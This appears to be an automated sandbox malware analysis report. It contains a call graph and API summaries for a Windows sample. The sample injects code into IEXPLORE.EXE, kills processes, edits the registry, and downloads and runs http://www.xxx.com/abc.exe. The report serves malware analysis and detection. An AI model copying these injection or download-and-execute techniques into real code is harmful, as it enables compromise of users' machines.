4086f8 5895->5896 5897 404b70 20 API calls 5896->5897 5898 40870c 5897->5898 5899 404b70 20 API calls 5898->5899 
5900 408720 5899->5900 5901 404dd0 17 API calls 5900->5901 5902 40872d 5901->5902 5903 404b70 20 API calls 5902->5903 5904 40873f 5903->5904 5905 404dd0 17 API calls 5904->5905 5906 40874c 5905->5906 5907 404b70 20 API calls 5906->5907 5908 40875e 5907->5908 5909 404d98 18 API calls 5908->5909 5910 408763 5909->5910 5911 406928 26 API calls 5910->5911 5912 408768 5911->5912 5913 408494 36 API calls 5912->5913 5914 40876d CreateThread CreateThread CreateThread CreateThread CreateThread 5913->5914 5914->5841 6756 407dd0 35 API calls 5914->6756 6757 407f54 58 API calls 5914->6757 6758 4084b8 37 API calls 5914->6758 6759 407bec 27 API calls 5914->6759 6760 4072ac 65 API calls 5914->6760 5916 4084b6 5915->5916 5917 4084ac 5915->5917 5916->5761 6761 4080c8 5917->6761 5922 406fab FindWindowExA GetWindowTextA 5921->5922 6043 403b3c 5922->6043 5924 406fe1 PostMessageA 5925 406fd0 5924->5925 5925->5922 5925->5924 5926 406ff1 GetDesktopWindow 5925->5926 5927 406ff8 FindWindowExA GetWindowTextA 5926->5927 5928 403b3c 17 API calls 5927->5928 5929 40701d 5928->5929 5929->5927 5930 40702e PostMessageA 5929->5930 5931 40703e GetDesktopWindow 5929->5931 5930->5929 5932 407045 FindWindowExA GetWindowTextA 5931->5932 5933 403b3c 17 API calls 5932->5933 5934 40706a 5933->5934 5934->5932 5935 40707b PostMessageA 5934->5935 5936 40708b GetDesktopWindow 5934->5936 5935->5934 5937 407092 FindWindowExA GetWindowTextA 5936->5937 5938 403b3c 17 API calls 5937->5938 5939 4070b7 5938->5939 5939->5937 5940 4070c8 PostMessageA 5939->5940 5941 4070d8 GetDesktopWindow 5939->5941 5940->5939 5942 4070df FindWindowExA GetWindowTextA 5941->5942 5943 403b3c 17 API calls 5942->5943 5944 407104 5943->5944 5944->5942 5945 407115 PostMessageA 5944->5945 5946 407125 GetDesktopWindow 5944->5946 5945->5944 5947 40712c FindWindowExA GetWindowTextA 5946->5947 5948 403b3c 17 API calls 5947->5948 5950 407151 5948->5950 5949 407162 PostMessageA 5949->5950 5950->5947 5950->5949 5951 407172 FindWindowA 5950->5951 
5952 407182 FindWindowA PostMessageA 5951->5952 5953 40719a FindWindowA 5951->5953 5952->5953 5954 4071c2 FindWindowA 5953->5954 5955 4071aa FindWindowA PostMessageA 5953->5955 5956 4071f0 5954->5956 5957 4071d5 FindWindowA PostMessageA 5954->5957 5955->5954 5958 4039f4 17 API calls 5956->5958 5957->5956 5959 40720a 5958->5959 5960 4039d0 5959->5960 5961 4039f1 5960->5961 5962 4039d6 5960->5962 5964 404dd0 5961->5964 5962->5961 6075 40248c 5962->6075 5965 404dd8 5964->5965 5966 404e12 5965->5966 5967 404e05 5965->5967 6079 403a68 5966->6079 5969 4039d0 17 API calls 5967->5969 5971 404e0d 5969->5971 5975 4039f4 17 API calls 5971->5975 5972 403a68 17 API calls 5973 404e2c 5972->5973 5974 403a68 17 API calls 5973->5974 5976 404e39 5974->5976 5977 404ee5 5975->5977 5978 403a68 17 API calls 5976->5978 5979 4039d0 17 API calls 5977->5979 5980 404e46 5978->5980 5981 404eed 5979->5981 6083 403c14 5980->6083 5981->5775 6092 404bfc RegOpenKeyExA 5990->6092 5992 404c35 RegQueryValueExA 5993 404c77 5992->5993 5994 404c5d 5992->5994 5996 4039d0 17 API calls 5993->5996 5995 403b3c 17 API calls 5994->5995 5997 404c6f RegCloseKey 5995->5997 5998 404c7e RegCloseKey 5996->5998 5999 404c84 5997->5999 5998->5999 6000 403a24 5999->6000 6001 403a28 6000->6001 6004 403a38 6000->6004 6003 403a94 17 API calls 6001->6003 6001->6004 6002 403a66 6002->5782 6003->6004 6004->6002 6005 40248c 17 API calls 6004->6005 6005->6002 6093 404acc RegCreateKeyExA 6006->6093 6008 404b1e 6094 403b00 6008->6094 6010 404b2a 6011 404b32 RegSetValueExA RegCloseKey 6010->6011 6012 404b55 6011->6012 6013 4039d0 17 API calls 6012->6013 6014 404b5d 6013->6014 6014->5788 6015->5794 6016->5796 6017->5798 6018->5807 6020 404897 6019->6020 6100 4047bc 6020->6100 6022 4048b9 6105 4047dc 6022->6105 6024 404996 6026 4039f4 17 API calls 6024->6026 6025 403b3c 17 API calls 6034 4048ca 6025->6034 6028 4049b3 6026->6028 6029 4039d0 17 API calls 6028->6029 6030 4049bb 6029->6030 6030->5812 6031 40496e OpenProcess 
TerminateProcess 6031->6034 6033 404fdc 17 API calls 6033->6034 6034->6024 6034->6025 6034->6031 6034->6033 6110 405018 6034->6110 6120 4047fc 6034->6120 6036 404b87 6035->6036 6037 404ba9 RegOpenKeyA 6036->6037 6140 403d4c 6037->6140 6040 404be2 6041 4039f4 17 API calls 6040->6041 6042 404bef 6041->6042 6042->5818 6044 403ac0 6043->6044 6049 403a94 6044->6049 6046 403ad0 6047 4039d0 17 API calls 6046->6047 6048 403ae8 6047->6048 6048->5925 6050 403a98 6049->6050 6051 403abc 6049->6051 6054 40246c 6050->6054 6051->6046 6055 402484 6054->6055 6056 402471 6054->6056 6055->6046 6056->6055 6058 402554 6056->6058 6059 402508 6058->6059 6060 40252d 6059->6060 6064 404164 6059->6064 6072 4024fc 6060->6072 6065 404173 6064->6065 6066 404199 TlsGetValue 6064->6066 6065->6060 6067 4041a3 6066->6067 6068 40417e 6066->6068 6067->6060 6069 404120 LocalAlloc TlsSetValue 6068->6069 6070 404183 TlsGetValue 6069->6070 6071 404192 6070->6071 6071->6060 6073 4039b8 17 API calls 6072->6073 6074 402507 6073->6074 6074->6055 6076 402491 6075->6076 6077 4024a4 6075->6077 6076->6077 6078 402554 17 API calls 6076->6078 6077->5961 6078->6077 6081 403a6c 6079->6081 6080 403a90 6080->5972 6081->6080 6082 40248c 17 API calls 6081->6082 6082->6080 6084 403c25 6083->6084 6085 403c45 6084->6085 6086 403c59 6084->6086 6087 403e74 17 API calls 6085->6087 6088 403a94 17 API calls 6086->6088 6089 403c53 6087->6089 6088->6089 6090 403c8a 6089->6090 6091 403a24 17 API calls 6089->6091 6091->6090 6092->5992 6093->6008 6095 403ac0 6094->6095 6096 403a94 17 API calls 6095->6096 6097 403ad0 6096->6097 6098 4039d0 17 API calls 6097->6098 6099 403ae8 6098->6099 6099->6010 6125 404540 6100->6125 6103 4047d6 6103->6022 6104 4047cb CreateToolhelp32Snapshot 6104->6022 6106 404540 17 API calls 6105->6106 6107 4047e7 6106->6107 6108 4047f6 6107->6108 6109 4047eb Process32First 6107->6109 6108->6034 6109->6034 6112 40502a 6110->6112 6111 405067 6114 405096 6111->6114 6117 403de4 17 API calls 6111->6117 6112->6111 
6129 403de4 6112->6129 6115 403a24 17 API calls 6114->6115 6116 4050a0 6115->6116 6118 4039d0 17 API calls 6116->6118 6117->6111 6119 4050b5 6118->6119 6119->6034 6121 404540 17 API calls 6120->6121 6122 404807 6121->6122 6123 404816 6122->6123 6124 40480b Process32Next 6122->6124 6123->6034 6124->6034 6126 404684 6125->6126 6127 40454f GetModuleHandleA 6125->6127 6126->6103 6126->6104 6127->6126 6128 404564 16 API calls 6127->6128 6128->6126 6134 403d9c 6129->6134 6131 403e28 6131->6112 6132 403df2 6132->6131 6133 403e74 17 API calls 6132->6133 6133->6131 6135 403d58 6134->6135 6136 403a94 17 API calls 6135->6136 6137 403d93 6135->6137 6138 403d6f 6136->6138 6137->6132 6138->6137 6139 40248c 17 API calls 6138->6139 6139->6137 6141 403d50 RegDeleteValueA RegCloseKey 6140->6141 6141->6040 6143 404f2c 18 API calls 6142->6143 6144 407df9 6143->6144 6145 403b5c 17 API calls 6144->6145 6146 407e06 6145->6146 6147 404af8 20 API calls 6146->6147 6148 407e25 6147->6148 6149 4039d0 17 API calls 6148->6149 6150 407e2f 6149->6150 6151 404dd0 17 API calls 6150->6151 6152 407e40 6151->6152 6153 404dd0 17 API calls 6152->6153 6154 407e56 6153->6154 6155 404c18 21 API calls 6154->6155 6156 407e6b 6155->6156 6157 403a24 17 API calls 6156->6157 6158 407e78 6157->6158 6159 407e87 6158->6159 6355 4068d0 InternetGetConnectedState 6158->6355 6161 4039f4 17 API calls 6159->6161 6162 407ea1 6161->6162 6164 404dd0 17 API calls 6163->6164 6165 407f89 6164->6165 6166 404dd0 17 API calls 6165->6166 6167 407f9f 6166->6167 6168 404af8 20 API calls 6167->6168 6169 407fb4 6168->6169 6170 404f2c 18 API calls 6169->6170 6171 407fbc 6170->6171 6172 403b5c 17 API calls 6171->6172 6173 407fc9 6172->6173 6174 404af8 20 API calls 6173->6174 6175 407fe8 6174->6175 6176 407ff7 6175->6176 6402 406708 InternetGetConnectedState 6175->6402 6178 4039f4 17 API calls 6176->6178 6179 408011 6178->6179 6181 408494 36 API calls 6180->6181 6182 4084c7 6181->6182 6184 407d0f 6183->6184 6187 407c12 6183->6187 6185 
4039f4 17 API calls 6184->6185 6186 407d29 6185->6186 6187->6184 6188 404f2c 18 API calls 6187->6188 6189 407c31 6188->6189 6190 403b5c 17 API calls 6189->6190 6191 407c3e 6190->6191 6192 404cf4 4 API calls 6191->6192 6193 407c46 6192->6193 6193->6184 6194 404f2c 18 API calls 6193->6194 6195 407c5a 6194->6195 6196 403b5c 17 API calls 6195->6196 6197 407c67 6196->6197 6198 407c7c URLDownloadToFileA 6197->6198 6199 407c92 6198->6199 6200 407c88 Sleep 6198->6200 6201 404f2c 18 API calls 6199->6201 6200->6199 6202 407c9c 6201->6202 6203 403b5c 17 API calls 6202->6203 6204 407ca9 6203->6204 6205 404f2c 18 API calls 6204->6205 6206 407cba 6205->6206 6207 403b5c 17 API calls 6206->6207 6208 407cc7 6207->6208 6209 407ccf CopyFileA Sleep 6208->6209 6210 404f2c 18 API calls 6209->6210 6211 407ced 6210->6211 6212 403b5c 17 API calls 6211->6212 6213 407cfa 6212->6213 6214 407d02 ShellExecuteA 6213->6214 6214->6184 6216 4072b4 6215->6216 6216->6216 6217 404d04 GetVersionExA 6216->6217 6218 4072cf 6217->6218 6219 4072d8 6218->6219 6220 4076df Sleep 6218->6220 6221 404f2c 18 API calls 6219->6221 6222 404f2c 18 API calls 6220->6222 6224 4072e0 6221->6224 6223 4076f3 6222->6223 6225 403b5c 17 API calls 6223->6225 6226 403b5c 17 API calls 6224->6226 6227 407700 6225->6227 6228 4072ed 6226->6228 6229 407708 SetFileAttributesA 6227->6229 6230 4027c8 4 API calls 6228->6230 6231 404f2c 18 API calls 6229->6231 6232 407304 6230->6232 6233 407716 6231->6233 6234 402560 4 API calls 6232->6234 6235 403b5c 17 API calls 6233->6235 6236 407309 6234->6236 6237 407723 6235->6237 6238 403ed8 4 API calls 6236->6238 6241 404af8 20 API calls 6237->6241 6239 407318 6238->6239 6240 4030f4 4 API calls 6239->6240 6242 40731d 6240->6242 6243 407742 6241->6243 6244 402560 4 API calls 6242->6244 6246 4039f4 17 API calls 6243->6246 6245 407322 6244->6245 6247 402ba8 4 API calls 6245->6247 6248 40775c 6246->6248 6249 40732c 6247->6249 6250 402560 4 API calls 6249->6250 6251 407331 6250->6251 6252 404f2c 18 
API calls 6251->6252 6253 407339 6252->6253 6254 403b5c 17 API calls 6253->6254 6255 407346 6254->6255 6256 4027d4 4 API calls 6255->6256 6257 40735d 6256->6257 6258 402560 4 API calls 6257->6258 6259 407362 6258->6259 6260 403ed8 4 API calls 6259->6260 6261 407371 6260->6261 6262 4030f4 4 API calls 6261->6262 6263 407376 6262->6263 6264 402560 4 API calls 6263->6264 6265 40737b 6264->6265 6266 403ed8 4 API calls 6265->6266 6267 40738a 6266->6267 6268 4030f4 4 API calls 6267->6268 6269 40738f 6268->6269 6270 402560 4 API calls 6269->6270 6271 407394 6270->6271 6272 402ba8 4 API calls 6271->6272 6273 40739e 6272->6273 6274 402560 4 API calls 6273->6274 6275 4073a3 Sleep 6274->6275 6276 404f2c 18 API calls 6275->6276 6277 4073be 6276->6277 6278 403c14 17 API calls 6277->6278 6279 4073d3 6278->6279 6280 4073db 15 API calls 6279->6280 6281 407549 6280->6281 6282 40753a SendMessageA 6280->6282 6283 404854 39 API calls 6281->6283 6282->6281 6284 407553 6283->6284 6285 404854 39 API calls 6284->6285 6286 40755d 6285->6286 6287 404854 39 API calls 6286->6287 6288 407567 6287->6288 6289 404854 39 API calls 6288->6289 6290 407571 6289->6290 6291 404854 39 API calls 6290->6291 6292 40757b 6291->6292 6293 404854 39 API calls 6292->6293 6294 407585 6293->6294 6295 404854 39 API calls 6294->6295 6296 40758f 6295->6296 6297 404854 39 API calls 6296->6297 6298 407599 6297->6298 6299 404854 39 API calls 6298->6299 6300 4075a3 6299->6300 6301 404854 39 API calls 6300->6301 6302 4075ad 6301->6302 6303 404854 39 API calls 6302->6303 6304 4075b7 6303->6304 6305 404854 39 API calls 6304->6305 6306 4075c1 6305->6306 6307 404854 39 API calls 6306->6307 6308 4075cb 6307->6308 6309 404854 39 API calls 6308->6309 6310 4075d5 6309->6310 6311 404854 39 API calls 6310->6311 6312 4075df 6311->6312 6313 404854 39 API calls 6312->6313 6314 4075e9 6313->6314 6315 404854 39 API calls 6314->6315 6316 4075f3 6315->6316 6317 404854 39 API calls 6316->6317 6318 4075fd 6317->6318 6319 404854 39 API calls 
6318->6319 6320 407607 6319->6320 6321 404854 39 API calls 6320->6321 6322 407611 6321->6322 6323 404854 39 API calls 6322->6323 6324 40761b 6323->6324 6325 404854 39 API calls 6324->6325 6326 407625 6325->6326 6327 404854 39 API calls 6326->6327 6328 40762f 6327->6328 6329 404854 39 API calls 6328->6329 6330 407639 6329->6330 6331 404854 39 API calls 6330->6331 6332 407643 6331->6332 6333 404854 39 API calls 6332->6333 6334 40764d 6333->6334 6335 404854 39 API calls 6334->6335 6336 407657 6335->6336 6337 404854 39 API calls 6336->6337 6338 407661 6337->6338 6339 404f2c 18 API calls 6338->6339 6340 40766b 6339->6340 6341 403b5c 17 API calls 6340->6341 6342 407678 6341->6342 6343 407680 SetFileAttributesA 6342->6343 6344 404f2c 18 API calls 6343->6344 6345 40768e 6344->6345 6346 403b5c 17 API calls 6345->6346 6347 40769b 6346->6347 6348 404af8 20 API calls 6347->6348 6349 4076ba 6348->6349 6350 404f2c 18 API calls 6349->6350 6351 4076c2 6350->6351 6352 403b5c 17 API calls 6351->6352 6353 4076cf 6352->6353 6354 4076d7 DeleteFileA 6353->6354 6354->6243 6356 4068e8 6355->6356 6357 4068ed 6355->6357 6359 406728 6356->6359 6357->6159 6387 404f84 GetSystemDirectoryA 6359->6387 6362 403b5c 17 API calls 6363 406757 6362->6363 6392 404cf4 6363->6392 6366 406824 6369 4039f4 17 API calls 6366->6369 6368 40676c 6371 4067d7 6368->6371 6372 406788 6368->6372 6370 40683e 6369->6370 6370->6357 6373 404dd0 17 API calls 6371->6373 6374 404dd0 17 API calls 6372->6374 6375 4067e8 6373->6375 6376 406799 6374->6376 6377 404dd0 17 API calls 6375->6377 6378 404dd0 17 API calls 6376->6378 6379 4067fe 6377->6379 6380 4067af 6378->6380 6381 404dd0 17 API calls 6379->6381 6382 404dd0 17 API calls 6380->6382 6383 406814 6381->6383 6384 4067c5 6382->6384 6386 40681c ShellExecuteA 6383->6386 6385 4067cd ShellExecuteA 6384->6385 6385->6366 6386->6366 6388 403b3c 17 API calls 6387->6388 6390 404faa 6388->6390 6389 404fc6 6389->6362 6390->6389 6391 403b5c 17 API calls 6390->6391 6391->6389 6396 
404c8c 6392->6396 6395 402728 GetSystemTime 6395->6368 6397 403d4c 6396->6397 6398 404ca6 FindFirstFileA 6397->6398 6399 404cb1 FindClose 6398->6399 6400 404ce5 6398->6400 6399->6400 6401 404cc0 FileTimeToLocalFileTime FileTimeToDosDateTime 6399->6401 6400->6366 6400->6395 6401->6400 6403 406720 6402->6403 6404 406725 6402->6404 6406 4066f8 6403->6406 6404->6176 6413 4055d8 6406->6413 6414 4055e0 6413->6414 6414->6414 6415 4039d0 17 API calls 6414->6415 6416 4055ff 6415->6416 6417 404dd0 17 API calls 6416->6417 6418 40560c 6417->6418 6419 403b00 17 API calls 6418->6419 6420 405620 6419->6420 6421 404f2c 18 API calls 6420->6421 6422 405628 6421->6422 6423 404dd0 17 API calls 6422->6423 6424 405639 6423->6424 6425 403b5c 17 API calls 6424->6425 6426 405642 6425->6426 6427 403b00 17 API calls 6426->6427 6428 405656 6427->6428 6429 405662 DeleteUrlCacheEntry 6428->6429 6430 403d4c 6429->6430 6431 405674 DeleteFileA 6430->6431 6432 40568a 6431->6432 6433 405697 URLDownloadToFileA 6432->6433 6434 4056a3 Sleep 6433->6434 6435 4056ad 6433->6435 6434->6435 6436 404cf4 4 API calls 6435->6436 6437 4056b9 6436->6437 6438 405859 6437->6438 6666 4027bc 6437->6666 6439 4039f4 17 API calls 6438->6439 6441 405873 6439->6441 6494 4058d0 6441->6494 6449 402560 4 API calls 6450 405701 6449->6450 6685 402ba8 6450->6685 6453 402560 4 API calls 6454 405710 6453->6454 6455 404f2c 18 API calls 6454->6455 6456 40571c 6455->6456 6457 405018 17 API calls 6456->6457 6458 40572f 6457->6458 6459 403b5c 17 API calls 6458->6459 6460 405738 6459->6460 6461 40574d URLDownloadToFileA 6460->6461 6462 405763 6461->6462 6463 405759 Sleep 6461->6463 6464 404f2c 18 API calls 6462->6464 6463->6462 6465 40576b 6464->6465 6466 405018 17 API calls 6465->6466 6467 40577e 6466->6467 6468 403b5c 17 API calls 6467->6468 6469 405787 6468->6469 6470 404cf4 4 API calls 6469->6470 6471 40578f 6470->6471 6471->6438 6472 404f2c 18 API calls 6471->6472 6473 4057a5 6472->6473 6474 405018 17 API calls 6473->6474 6475 
                                                                            APIs
                                                                              • Part of subcall function 007418A1: GetVersionExA.KERNEL32(?), ref: 007418BB
                                                                            • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 00741BE9
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741CD0
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741CDE
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741CEC
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741CFA
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D08
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D16
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D24
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D32
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D40
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D4E
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D5C
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D6A
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D78
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D86
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741D94
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DA2
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DB0
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DBE
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DCC
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DDA
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DE8
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741DF6
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E04
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E12
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E20
                                                                            • LoadLibraryA.KERNEL32(Wininet.dll), ref: 00741E32
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00741E48
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E58
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E68
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E78
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E88
                                                                            • GetProcAddress.KERNEL32(?), ref: 00741E98
                                                                            • LoadLibraryA.KERNEL32(Urlmon.dll), ref: 00741EA4
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00741EB5
                                                                            • LoadLibraryA.KERNEL32(Psapi.dll), ref: 00741EC4
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00741ED3
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00741EE1
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00741EEF
                                                                            • OpenProcess.KERNEL32(0000042A,00000000,00000000), ref: 00741FC0
                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000084,00000000,00000000,?,?), ref: 00742047
                                                                            • GetInputState.USER32 ref: 00742055
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0074205E
                                                                            • PostThreadMessageA.USER32(00000000), ref: 00742065
                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00742075
                                                                            • ReadProcessMemory.KERNEL32(?,?,007422C8,00000032,?), ref: 0074208C
                                                                            • VirtualAllocEx.KERNEL32(?,00000000,741C5C2D,00001000,00000040), ref: 007420BF
                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,741C5C2D,?), ref: 007420ED
                                                                            • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 007420FD
                                                                            • WriteProcessMemory.KERNEL32(?,00000001,?,00000004,?), ref: 00742158
                                                                            • WriteProcessMemory.KERNEL32(?,-00000006,?,00000004,?), ref: 0074216B
                                                                            • WriteProcessMemory.KERNEL32(?,00741C1B,00742358,00000004,?), ref: 00742189
                                                                            • VirtualProtectEx.KERNEL32(?,?,00000032,00000040,?), ref: 007421B7
                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000032,?), ref: 007421D0
                                                                            • WriteProcessMemory.KERNEL32(?,?,0074235C,00000004,?), ref: 007421F0
                                                                            • ResumeThread.KERNEL32(?), ref: 007421FA
                                                                            • GetInputState.USER32 ref: 00742200
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00742209
                                                                            • PostThreadMessageA.USER32(00000000), ref: 00742210
                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00742220
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00742236
                                                                            • CreateRemoteThread.KERNEL32(?,00000000,00000000,00741C1A,00000000,00000000,?), ref: 00742252
                                                                            • SetThreadPriority.KERNEL32(00000000,00000002), ref: 00742268
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00742271
                                                                            • VirtualFreeEx.KERNEL32(?,00741C0A,00000000,00008000), ref: 00742283
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00742290
                                                                            • CloseHandle.KERNEL32(?), ref: 00742295
                                                                            • CloseHandle.KERNEL32(?), ref: 0074229A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2016766274.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: true
                                                                            • Associated: 00000000.00000003.2016766274.0000000000745000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_740000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Process$MemoryThread$Write$LibraryLoadMessageVirtual$CloseHandle$CreateCurrentFreeInputObjectPostSingleStateWait$AllocOpenPriorityProtectReadRemoteResumeVersion
                                                                            • String ID: 2$IEXPLORE.EXE$Kernel32.dll$Psapi.dll$Urlmon.dll$Wininet.dll$_Y
                                                                            • API String ID: 742397454-3370953745
                                                                            • Opcode ID: 96af4d441d46fc301b740a5b82f0225b21cefff780600eb2350bdd0ca4e60926
                                                                            • Instruction ID: 44a15ee7f3550474fac5bc6e8fc29948b99346555f72798e68ad0e8b5e05ed30
                                                                            • Opcode Fuzzy Hash: 96af4d441d46fc301b740a5b82f0225b21cefff780600eb2350bdd0ca4e60926
                                                                            • Instruction Fuzzy Hash: D8123D79900258EFDB11EFA5DC84DAE7FB9FB4A740B80802BF90492231D7394991DF68

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00407C7F
                                                                            • Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407C8D
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00407CD0
                                                                            • Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407CDA
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407D0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: FileSleep$CopyDirectoryDownloadExecuteShellWindows
                                                                            • String ID: bbyb.exe$bbybs.exe$http://www.xxx.com/abc.exe$open
                                                                            • API String ID: 1899506612-3830082169
                                                                            • Opcode ID: 74dddda8ba28423a3b8d1139dc2664c01dbdf4c90ccd245ff7deac2de5b3cde6
                                                                            • Instruction ID: bc9fdd56434a3f6b10c0c995d718bd545f813c534919513bdb7c3ec1913c9215
                                                                            • Opcode Fuzzy Hash: 74dddda8ba28423a3b8d1139dc2664c01dbdf4c90ccd245ff7deac2de5b3cde6
                                                                            • Instruction Fuzzy Hash: A231F170A442096BD700FBA5D942BAE7BBDEF44709F50407BB500B76D2DB78BE00866E

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$CacheEntryFile$DirectoryDownloadWindows
                                                                            • String ID: bbyb.dll$http://www.xxx.com/qqmsg.txt
                                                                            • API String ID: 2436712417-1998065829
                                                                            • Opcode ID: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
                                                                            • Instruction ID: fb79d00d57ea562a78b15d8b1474b2916bd554e92aef79f5ae6ec560df59828f
                                                                            • Opcode Fuzzy Hash: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
                                                                            • Instruction Fuzzy Hash: DF11FC70614204AFD700FB65CE42B9A7BBDEF45705F50407AF944BB6E2CB78AE058A6C
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CA7
                                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CB2
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00404CCB
                                                                            • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00404CDC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
